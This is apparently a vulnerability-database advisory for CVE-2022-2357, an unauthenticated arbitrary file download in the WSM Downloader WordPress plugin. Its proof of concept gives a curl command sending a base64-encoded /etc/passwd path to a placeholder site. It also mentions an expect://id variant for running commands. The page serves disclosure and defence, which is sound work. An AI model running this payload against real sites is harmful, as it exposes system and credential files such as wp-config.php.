WSM Downloader <= 1.4.0 – Unauthenticated Arbitrary File Download | CVE 2022-2357 | Plugin Vulnerabilities

Description

The plugin allows any visitor to use its remote file download feature to download any local files, including sensitive ones like wp-config.php.

Proof of Concept

# Base64 encode your payload, for example

# Base64(expect://id) -> ZXhwZWN0Oi8vaWQ= (requires the "expect" PECL extension to be installed)
Base64(/etc/passwd) -> L2V0Yy9wYXNzd2Q=

curl -v -d "dl=L2V0Yy9wYXNzd2Q=&size=200&type=text/plain"  https://example.com/page

Affects Plugins

No known fix

References

CVE

Classification

Type

FILE DOWNLOAD

OWASP top 10

CWE

CVSS

Miscellaneous

Original Researcher

Raad Haddad of Cloudyrion GmbH

Submitter

Raad Haddad of Cloudyrion GmbH

Submitter twitter

Verified

Yes

WPVDB ID

42499b84-684e-42e1-b7f0-de206d4da553

Timeline

Publicly Published

2022-07-12 (about 3 years ago)

Added

2022-07-12 (about 3 years ago)

Last Updated

2023-04-14 (about 2 years ago)

Other

Published

Title

Published

2025-12-11

Title

Secure Copy Content Protection and Content Locking < 4.9.3 - Unauthenticated Sensitive Information Exposure via Exposed CSV Export File

Published

2025-12-22

Title

PhastPress < 3.8 - Unauthenticated Arbitrary File Read via Null Byte Injection

Published

2022-12-12

Title

Wholesale Market < 2.2.1 - Unauthenticated Arbitrary File Download

Published

2022-01-10

Title

SEUR Oficial < 1.7.2 - Admin+ Arbitrary File Download

Published

2022-08-01

Title

Lana Downloads Manager < 1.8.0 - Contributor+ Arbitrary File Download